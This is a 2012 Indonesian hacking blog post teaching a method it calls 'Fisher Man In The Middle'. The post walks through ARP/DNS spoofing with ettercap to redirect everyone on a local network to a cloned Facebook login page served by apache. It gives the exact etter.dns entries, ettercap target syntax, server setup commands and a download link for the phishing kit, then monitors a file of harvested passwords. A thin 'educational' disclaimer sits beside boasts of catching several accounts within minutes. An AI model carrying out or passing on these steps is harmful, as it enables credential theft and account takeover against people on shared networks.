Searching...
May 9, 2012
Wednesday, May 09, 2012

FMITM Hacking Account [Facebook]

Ada banyak sekali cara melakukan peretasan akun facebook. Cara yang sedang populer adalah menggunakan social engineering attack. Penggunaan social engineering sendiri, mengandalkan kecerobohan korban, agar korban masuk ke dalam jebakan peretas. Cara ini yang paling ampuh, karena tidak ada patch untuk kebodohan manusia. Kali ini saya tidak memberikan tutorial social engineering attack, karena saya tidak expert dalam masalah social engineering, melainkan dengan menggunakan metode saya sendiri. Saya menyebutnya dengan Fisher Man In The Middle.

Concept:

Konsepnya adalah menggabungkan MITM attack dengan fake login attack. Saya mengkloning halaman login facebook, kemudian memodifikasi script login dan menempatkannya pada localhost. Mengapa localhost? IP local lebih cocok dalam melakukan spoofing attack pada metode MITM. Selain itu, membuat domain lebih sulit dan repot ketimbang menggunakan mesin sendiri sebagai server. Setelah membuat halaman login, saya menjalankan metode MITM dengan ettercap, dan melakukan spoofing attack. Sehingga semua user dalam localhost, akan di-redirect menuju IP address saya, dimana IP address saya menuju ke port 80 dan fake login saya sudah siap melakukan tugasnya.

Kelebihan:
  1. FMITM tidak membutuhkan file dan web hosting
  2. Dalam prakteknya FMITM dapat menjaring lebih dari 3 user account dalam waktu kurang dari 10 menit.
  3. Cara ini nyaris tidak dapat dihindari, karena metode MITM yang dipakai.

MITM [DNS Spoofing]

Victim -> Packet [Bring me to google] -> Access Point
Victim <- Packet [Google] <- Access Point

Diatas, menunjukan sesaat sebelum terjadinya spoofing attack yang dilakukan oleh attacker. Dimana korban mengirim paket berisi "bawa saya menuju google", paket ini dikirim kepada access point. Kemudian access point mendapat packet dari korban, sebagai respon, access point akan menghubungkan korban kepada google.

Victim -> Packet [Bring me to google] -> FMITM aka attacker [Modifying Packet] ->  Packet [Bring me to IP attacker] -> Access Point
Victim <- Packet [IP attacker] <- FMITM aka attacker [Forwarding Packet] <- Packet [IP attacker] Access Point

Sementara alur diatas menjelaskan FMITM attack.
  1. Korban mengirim paket kepada access point (AP), paket berisi "Tolong bawa saya ke google"
  2. Attacker mengambil paket, dan memodifikasinya (inject packet with poison). Paket diubah menjadi "Bawa saya ke IP attacker".
  3. Paket yang telah dimodifikasi oleh Attacker dikirim ke AP.
  4. AP menerima paket, sebagai respon AP mengirim pake balasan dengan isi "IP attacker"
  5. Packet tersebut kembali di-intercept oleh attacker, kali ini attacker tidak memodifikasi paket. Melainkan hanya meneruskan packet tersebut kepada korban.
  6. Korban menerima paket, dan menuju ke IP attacker
Attacker telah menjalankan service HTTPD, sehingga ketika korban menuju IP address attacker, korban akan melihat halaman index milik attacker. Halaman index attacker telah diubah oleh attacker, sehingga halaman ini dapat melakukan aksi pishing.

Mengapa MITM?
Aksi MITM dapat membuat korban menuju fake login page, KEMANAPUN korban mencoba pergi. Dan metode ini tidak mengubah URL korban, sehingga tidak menimbulkan kecurigaan.

Mengapa Fake Login?
Fake login adalah paduan yang cocok dengan metode MITM, mengingat SET milik dave_rel1k masih menerima service cookie. Sehingga terjadi kecacatan dalam output hasil pancingan.

Preparation :
  1. ettercap (dapat ditemukan pada backtrack)
  2. apache (dapat ditemukan pada backtrack)
  3. Fake login script (dapat di download di sini)
Note : password archive adalah "red-dragon" (tanpa tanda kutip)

EULA (End User License Agreement)
Tutorial ini ditulis dengan tujuan edukasi, panyalah gunaan skill yang terdapat dalam tutorial ini, adalah tanggung jawab pembaca.

Walktrough
1. Setting Up Ettercap

Ketahuilah IP address anda, ini hal paling dasar dalam melakukan FMITM. Anda juga harus memperhatikan lewat mana anda menyerang. MITM hanya berlaku pada localhost, jika anda menggunakan modem, anda tidak bisa melakukan hal ini lebih jauh. Jika anda menggunakan kabel LAN, maka anda menggunakan interface eth0. Jika anda menggunakan jaringan nirkabel (wifi), maka anda menggunakan interface wlan0. Untuk mengecek IP address, anda dapat menggunakan perintah:

Command :
<< back|track 5 R2 [~] ifconfig vmnet8 | grep "inet addr:" | awk -F ":" '{print $2}' | sed s/"  Bcast"//g


Kali ini saya menggunakan Virtual OS untuk menguji keberhasilan metode saya. Hal ini bertujuan agar tidak ada pihak yang dirugikan selama pembuatan tutorial ini. Virtual OS saya menggunakan network adapter NAT, dimana Virtual OS saya dapat menggunakan internet JIKA backtrack saya memiliki akses internet. Saya menggunakan Windows XP Service Pack 2, berbahasa Inggris selama pengujian metode ini.

IP address saya adalah 10.10.2.1. Selanjutnya saya akan menaruh IP address ini pada config file dns spoof milik ettercap. Untuk dapat meng-input IP address ini, gunakan perintah

Command :
<< back|track 5 R2 [~] nano /usr/local/share/ettercap/etter.dns

Kemudian arahkan pointer keyboard pada akhir halaman, dan tambahkan:

Input :
* A [IP Address Anda]


Pengaturan seperti ini akan membuat korban dialihkan ke 10.10.2.1 KEMANAPUN korban pergi. Jika anda hanya ingin mengalihkan korban yang menuju youtube, maka.

Input :
*.youtube.com/* A [IP Address Anda]

Gunakan kemampuan bernalar anda sendiri dalam melakukan pengaturan file ettercap. Setelah selesai, tekan tombol ctrl+x kemudian tekan y, dan enter. File pengaturan anda berhasil tersimpan!


2. Mengatur fake login

Setelah mengunduh file dari link yang tersedia dalam persiapan di atas, copy semua file ke folder /var/www. Perlu diperhatikan. Anda harus mengubah ownership file ini menjadi milik www-data agar pishing dapat bekerja sebagaimana mestinya. Untuk mengecek ownership file, gunakan perintah

Command :
<< back|track 5 R2 [~] cd /var/www

Command :
<< back|track 5 R2 [/var/www] ls -l


Perhatikan, semua file ini milik root! Anda harus mengubah ownership file ini menjadi milik www-data dengan perintah

Command :
<< back|track 5 R2 [/var/www] chown www-data:www-data *

Kemudian cek kembali ownership file dengan perintah

Command :
<< back|track 5 R2 [/var/www] ls -l


Setelah file-file ini menjadi milik www-data. Maka selanjutnya kita akan menjalankan service apache, untuk menjalankan service apache, gunakan perintah:


Command :
<< back|track 5 R2 [/var/www] apache2ctl start


atau


Command :
<< back|track 5 R2 [/var/www] service apache2 start


atau


Command :
<< back|track 5 R2 [/var/www] /etc/ini.d/apache2 start


dan semua persiapanpun telah selesai.


3. FMITM in action

Sebelum memulai FMITM, saya akan membuktikan keberhasilan MITM dalam melakukan redirect ke IP address saya. Ini adalah screenshoot sebelum FMITM dilakukan:


Perhatikan command prompt. Perintah ping www.google.com menunjukan adanya balasan dari google, IP address ini milik google, dan ini wajar pada jaringan yang belum terserang MITM attack.

Kemudian saya jalankan perintah MITM dengan menggunakan etercap.

Command :
<< back|track 5 R2 [/var/www] ettercap -T -q -i vmnet8 -M ARP:REMOTE // // -P dns_spoof

Perhatikan kembali IP address anda, dan sesuaikan dengan perintah ettercap anda. Tanda // adalah target anda. // pertama menunjukan target 1, dan // kedua menunjukan target 2. Jika anda isi kosong, maka ettercap akan melancarkan serangan kepada semua IP address pada localhost, termasuk anda sendiri! Bagaimana jika anda hanya mengicar 1 orang?

Contoh:
Target 1 = 192.168.1.1 [Target 1 HARUS IP gate away]
Target 2 = 192.168.1.2

Maka perintah ettercap

Command :
<< back|track 5 R2 [/var/www] ettercap -T -q -i vmnet8 -M ARP:REMOTE /192.168.1.1/ /192.168.1.2/ -P dns_spoof

Bagaimana jika target 2 berjumlah lebih dari 1?

Contoh:
Target 1 = 192.168.1.1 [Target 1 HARUS IP gate away]
Target 2 = 192.168.1.2 dan 192.168.1.3

Command :
<< back|track 5 R2 [/var/www] ettercap -T -q -i vmnet8 -M ARP:REMOTE /192.168.1.1/ /192.168.1.2,3/ -P dns_spoof

Dan ini adalah screenshoot ketika MITM terjadi


Perhatikan kembali command prompt. Pada perintah ping www.google.com yang ke dua, IP balasan bukanlah seperti IP address pada perintah ping pertama sebelum terjadinya MITM. IP balasan justru 10.10.2.1, dimana IP tersebut, adalah IP milik saya. Perhatikan juga URL pada Mozilla. URL menunjukan www.google.com, namun halaman berubah menjadi index localhost milik attacker. Monitoring selalu file hasil.txt dengan perintah

Command :
<< back|track 5 R2 [~] tail -f /var/www/hasil.txt

Jika ada korban yang masuk, maka....



You are so.....

Pwned by : red-dragon

5 comment:

Post a Comment

 
Back to top!